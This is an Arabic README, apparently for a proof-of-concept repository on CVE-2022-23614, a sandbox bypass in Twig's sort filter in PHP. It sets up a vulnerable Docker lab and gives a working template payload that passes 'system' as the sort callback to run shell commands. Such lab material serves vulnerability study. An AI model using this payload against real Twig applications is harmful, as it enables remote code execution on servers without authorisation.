
استغلال إثبات المفهوم لثغرة CVE-2022-23614 يوضح تنفيذ كود تعسفي عبر تجاوز الحماية (sandbox) لمرشح الفرز (sort) الخاص بـ Twig في تطبيقات PHP.
إثبات المفهوم لـ CVE-2022-23614، GHSA-5mv2-rx3q-4w2v (تنفيذ الأكواد/تجاوز الحماية عبر مرشح sort في Twig)
كما يظهر في هذا الالتزام - https://github.com/twigphp/Twig/commit/..، كان Twig يمرر اسم دالة يقدمه المستخدم كوسيط استدعاء لدالة uasort (هنا)، مما يؤدي إلى تنفيذ أكواد عشوائية
لبناء وتشغيل حاوية docker مع نسخة ضعيفة من Twig
$ ./build-docker.sh
افتح صفحة الويب على localhost:1337 وجرب عرض المحتوى التالي
{{ ['id','']|sort('system') }}
إثبات المفهوم

النتيجة
